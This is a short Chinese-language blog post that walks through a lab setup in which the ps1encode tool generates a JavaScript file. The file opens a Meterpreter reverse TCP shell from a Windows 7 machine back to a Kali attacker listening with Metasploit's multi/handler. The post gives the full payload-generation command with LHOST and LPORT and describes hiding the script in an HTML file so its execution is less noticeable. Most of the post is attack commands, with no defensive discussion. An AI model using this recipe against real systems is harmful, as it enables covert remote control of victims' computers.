[Shell]利用JS文件反弹Shell

0x01 模拟环境

攻击: kali
ip: 192.168.248.132
测试: windows 7 x64
ip: 192.168.248.136

0x02 工具地址

https://github.com/CroweCybersecurity/ps1encode

git clone https://github.com/CroweCybersecurity/ps1encode.git

0x03 漏洞复现

1.生成js脚本

./pslencode.rb --LHOST 192.168.248.132 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

复制文本放到文件中生成1.js文件

2.监听端口反弹shell

use exploit/multi/handler

3.windows执行文件

直接执行的话可能比较明显,所以参照文章我们写了一个1.html文件

4.执行1.html文件,选择运行->允许阻止内容->选择是,就反弹成功了

5.获取shell

posted @ 2019-09-17 19:27  肖洋肖恩、  阅读(1760)  评论(0编辑  收藏  举报
jQuery火箭图标返回顶部代码